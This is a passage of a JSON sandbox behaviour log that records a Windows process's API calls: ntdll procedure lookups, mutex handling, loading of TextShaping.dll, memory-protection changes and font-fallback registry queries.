}, { "name": "FunctionName", "value": "RtlRegisterFeatureConfigurationChangeNotification" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x77182560" } ], "repeated": 0, "id": 830 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "ModuleHandle", "value": "0x77150000" }, { "name": "FunctionName", "value": "NtQueryWnfStateData" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x771c4820" } ], "repeated": 0, "id": 831 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "ModuleHandle", "value": "0x77150000" }, { "name": "FunctionName", "value": "RtlSubscribeWnfStateChangeNotification" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x77180780" } ], "repeated": 0, "id": 832 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "ModuleHandle", "value": "0x77150000" }, { "name": "FunctionName", "value": "RtlDisownModuleHeapAllocation" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x771bc9f0" } ], "repeated": 0, "id": 833 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "ModuleHandle", "value": "0x77150000" }, { "name": "FunctionName", "value": "RtlQueryFeatureConfiguration" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x771b5a30" } ], "repeated": 0, "id": 834 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "ModuleHandle", "value": "0x77150000" }, { "name": "FunctionName", "value": "RtlDllShutdownInProgress" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x771afa60" } ], "repeated": 0, "id": 835 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "synchronization", "api": "NtCreateMutant", "status": true, "return": "0x40000000", "arguments": [ { "name": "Handle", "value": "0x00000288" }, { "name": "MutexName", "value": "Local\\SM0:7456:168:WilStaging_02" }, { "name": "InitialOwner", "value": "0" } ], "repeated": 0, "id": 836 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "system", "api": "NtWaitForSingleObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000288" }, { "name": "Milliseconds", "value": "18446744073709551615" }, { "name": "Status", "value": "Infinite" } ], "repeated": 0, "id": 837 }, { "timestamp": "2025-03-02 21:32:33,420", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 838 }, { "timestamp": "2025-03-02 21:32:33,420", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "system", "api": "NtWaitForSingleObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000028c" }, { "name": "Milliseconds", "value": "0" } ], "repeated": 0, "id": 839 }, { "timestamp": "2025-03-02 21:32:33,420", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000028c" } ], "repeated": 0, "id": 840 }, { "timestamp": "2025-03-02 21:32:33,420", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "synchronization", "api": "NtReleaseMutant", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000288" } ], "repeated": 1, "id": 841 }, { "timestamp": "2025-03-02 21:32:33,420", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "process", "api": "NtOpenSection", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "SectionHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x0000000d" }, { "name": "ObjectAttributes", "value": "TextShaping.dll" } ], "repeated": 0, "id": 842 }, { "timestamp": "2025-03-02 21:32:33,420", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "filesystem", "api": "NtQueryAttributesFile", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "FileName", "value": "C:\\Users\\pacop\\AppData\\Local\\Temp\\TextShaping.dll" } ], "repeated": 0, "id": 843 }, { "timestamp": "2025-03-02 21:32:33,420", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "filesystem", "api": "NtQueryAttributesFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "C:\\Windows\\System32\\TextShaping.dll" } ], "repeated": 0, "id": 844 }, { "timestamp": "2025-03-02 21:32:33,420", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "filesystem", "api": "NtOpenFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000288" }, { "name": "DesiredAccess", "value": "0x00100021", "pretty_value": "FILE_READ_ACCESS|FILE_EXECUTE|SYNCHRONIZE" }, { "name": "FileName", "value": "C:\\Windows\\System32\\TextShaping.dll" }, { "name": "ShareAccess", "value": "5", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" } ], "repeated": 0, "id": 845 }, { "timestamp": "2025-03-02 21:32:33,420", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "process", "api": "NtCreateSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x0000028c" }, { "name": "DesiredAccess", "value": "0x0000000d", "pretty_value": "SECTION_QUERY|SECTION_MAP_READ|SECTION_MAP_EXECUTE" }, { "name": "ObjectAttributes", "value": "" }, { "name": "FileHandle", "value": "0x00000288" } ], "repeated": 0, "id": 846 }, { "timestamp": "2025-03-02 21:32:33,420", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "process", "api": "NtMapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x0000028c" }, { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x732a0000" }, { "name": "SectionOffset", "value": "0x00000000" }, { "name": "ViewSize", "value": "0x00097000" }, { "name": "Win32Protect", "value": "0x00000080", "pretty_value": "PAGE_EXECUTE_WRITECOPY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 847 }, { "timestamp": "2025-03-02 21:32:33,420", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x77279000" }, { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00003000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 848 }, { "timestamp": "2025-03-02 21:32:33,420", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x77279000" }, { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00003000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 849 }, { "timestamp": "2025-03-02 21:32:33,420", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x73333000" }, { "name": "ModuleName", "value": "TextShaping.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 850 }, { "timestamp": "2025-03-02 21:32:33,420", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000028c" } ], "repeated": 0, "id": 851 }, { "timestamp": "2025-03-02 21:32:33,420", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000288" } ], "repeated": 0, "id": 852 }, { "timestamp": "2025-03-02 21:32:33,420", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x73333000" }, { "name": "ModuleName", "value": "TextShaping.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 853 }, { "timestamp": "2025-03-02 21:32:33,420", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\SYSTEM32\\TextShaping" }, { "name": "DllBase", "value": "0x732a0000" } ], "repeated": 0, "id": 854 }, { "timestamp": "2025-03-02 21:32:33,420", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "system", "api": "LdrpCallInitRoutine", "status": true, "return": "0x00000001", "arguments": [ { "name": "MappedPath", "value": "\\Device\\HarddiskVolume2\\Windows\\SysWOW64\\TextShaping" }, { "name": "BaseAddress", "value": "0x732a0000" }, { "name": "InitRoutine", "value": "0x733307b0" }, { "name": "Reason", "value": "1" } ], "repeated": 0, "id": 855 }, { "timestamp": "2025-03-02 21:32:33,420", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7582e000" }, { "name": "ModuleName", "value": "gdi32full.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 856 }, { "timestamp": "2025-03-02 21:32:33,420", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7582e000" }, { "name": "ModuleName", "value": "gdi32full.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 857 }, { "timestamp": "2025-03-02 21:32:33,420", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "process", "api": "NtFreeVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x0722c000" }, { "name": "RegionSize", "value": "0x00018000" }, { "name": "FreeType", "value": "0x00004000" } ], "repeated": 0, "id": 858 }, { "timestamp": "2025-03-02 21:32:33,420", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "process", "api": "NtFreeVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x07226000" }, { "name": "RegionSize", "value": "0x00003000" }, { "name": "FreeType", "value": "0x00004000" } ], "repeated": 0, "id": 859 }, { "timestamp": "2025-03-02 21:32:33,420", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x07226000" }, { "name": "RegionSize", "value": "0x00003000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 860 }, { "timestamp": "2025-03-02 21:32:33,420", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "misc", "api": "RtlSetCurrentTransaction", "status": true, "return": "0x00000001", "arguments": [ { "name": "TransactionHandle", "value": "0x00000000" } ], "repeated": 1, "id": 861 }, { "timestamp": "2025-03-02 21:32:33,420", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtOpenKeyEx", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000288" }, { "name": "DesiredAccess", "value": "0x00000101", "pretty_value": "KEY_QUERY_VALUE|KEY_WOW64_64KEY" }, { "name": "ObjectAttributesHandle", "value": "0x00000100" }, { "name": "ObjectAttributesName", "value": "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback" } ], "repeated": 0, "id": 862 }, { "timestamp": "2025-03-02 21:32:33,420", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000288" }, { "name": "ValueName", "value": "Plane1" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane1" } ], "repeated": 0, "id": 863 }, { "timestamp": "2025-03-02 21:32:33,420", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtQueryValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000288" }, { "name": "ValueName", "value": "Plane2" }, { "name": "Type", "value": "1", "pretty_value": "REG_SZ" }, { "name": "Information", "value": "SimSun-ExtB" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane2" } ], "repeated": 1, "id": 864 }, { "timestamp": "2025-03-02 21:32:33,420", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtQueryValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000288" }, { "name": "ValueName", "value": "Plane3" }, { "name": "Type", "value": "1", "pretty_value": "REG_SZ" }, { "name": "Information", "value": "SimSun-ExtG" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane3" } ], "repeated": 1, "id": 865 }, { "timestamp": "2025-03-02 21:32:33,420", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000288" }, { "name": "ValueName", "value": "Plane4" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane4" } ], "repeated": 0, "id": 866 }, { "timestamp": "2025-03-02 21:32:33,420", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000288" }, { "name": "ValueName", "value": "Plane5" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane5" } ], "repeated": 0, "id": 867 }, { "timestamp": "2025-03-02 21:32:33,420", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000288" }, { "name": "ValueName", "value": "Plane6" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane6" } ], "repeated": 0, "id": 868 }, { "timestamp": "2025-03-02 21:32:33,420", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000288" }, { "name": "ValueName", "value": "Plane7" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane7" } ], "repeated": 0, "id": 869 }, { "timestamp": "2025-03-02 21:32:33,420", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000288" }, { "name": "ValueName", "value": "Plane8" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane8" } ], "repeated": 0, "id": 870 }, { "timestamp": "2025-03-02 21:32:33,420", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000288" }, { "name": "ValueName", "value": "Plane9" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane9" } ], "repeated": 0, "id": 871 }, { "timestamp": "2025-03-02 21:32:33,420", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000288" }, { "name": "ValueName", "value": "Plane10" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane10" } ], "repeated": 0, "id": 872 }, { "timestamp": "2025-03-02 21:32:33,420", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000288" }, { "name": "ValueName", "value": "Plane11" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane11" } ], "repeated": 0, "id": 873 }, { "timestamp": "2025-03-02 21:32:33,420", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000288" }, { "name": "ValueName", "value": "Plane12" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane12" } ], "repeated": 0, "id": 874 }, { "timestamp": "2025-03-02 21:32:33,420", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000288" }, { "name": "ValueName", "value": "Plane13" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane13" } ], "repeated": 0, "id": 875 }, { "timestamp": "2025-03-02 21:32:33,420", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000288" }, { "name": "ValueName", "value": "Plane14" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane14" } ], "repeated": 0, "id": 876 }, { "timestamp": "2025-03-02 21:32:33,420", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000288" }, { "name": "ValueName", "value": "Plane15" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane15" } ], "repeated": 0, "id": 877 }, { "timestamp": "2025-03-02 21:32:33,420", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000288" }, { "name": "ValueName", "value": "Plane16" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane16" } ], "repeated": 0, "id": 878 }, { "timestamp": "2025-03-02 21:32:33,420", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000288" } ], "repeated": 0, "id": 879 }, { "timestamp": "2025-03-02 21:32:33,420", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "misc", "api": "RtlSetCurrentTransaction", "status": true, "return": "0x00000001", "arguments": [ { "name": "TransactionHandle", "value": "0x00000000" } ], "repeated": 1, "id": 880 }, { "timestamp": "2025-03-02 21:32:33,420", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtOpenKeyEx", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000288" }, { "name": "DesiredAccess", "value": "0x00000109", "pretty_value": "KEY_QUERY_VALUE|KEY_ENUMERATE_SUB_KEYS|KEY_WOW64_64KEY" }, { "name": "ObjectAttributesHandle", "value": "0x00000100" }, { "name": "ObjectAttributesName", "value": "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback" } ], "repeated": 0, "id": 881 }, { "timestamp": "2025-03-02 21:32:33,420", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtQueryKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000288" }, { "name": "KeyInformation", "value": "\\xffb2\\xff84_\\x1c\t\\xff81\\xffdb\\x01\\x00\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x1a\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x0c\\x00\\x00\\x00\\x18\\x00\\x00\\x00\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00" }, { "name": "KeyInformationClass", "value": "4" } ], "repeated": 0, "id": 882 }, { "timestamp": "2025-03-02 21:32:33,420", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000288" }, { "name": "Index", "value": "0" } ], "repeated": 0, "id": 883 }, { "timestamp": "2025-03-02 21:32:33,420", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000288" }, { "name": "Index", "value": "1" } ], "repeated": 0, "id": 884 }, { "timestamp": "2025-03-02 21:32:33,420", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000288" }, { "name": "Index", "value": "2" } ], "repeated": 0, "id": 885 }, { "timestamp": "2025-03-02 21:32:33,420", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000288" }, { "name": "Index", "value": "3" } ], "repeated": 0, "id": 886 }, { "timestamp": "2025-03-02 21:32:33,420", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtOpenKeyEx", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00000101", "pretty_value": "KEY_QUERY_VALUE|KEY_WOW64_64KEY" }, { "name": "ObjectAttributesHandle", "value": "0x00000288" }, { "name": "ObjectAttributesName", "value": "Tahoma" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Tahoma" } ], "repeated": 0, "id": 887 }, { "timestamp": "2025-03-02 21:32:33,420", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000288" } ], "repeated": 0, "id": 888 }, { "timestamp": "2025-03-02 21:32:33,420", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x0722c000" }, { "name": "RegionSize", "value": "0x00018000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", 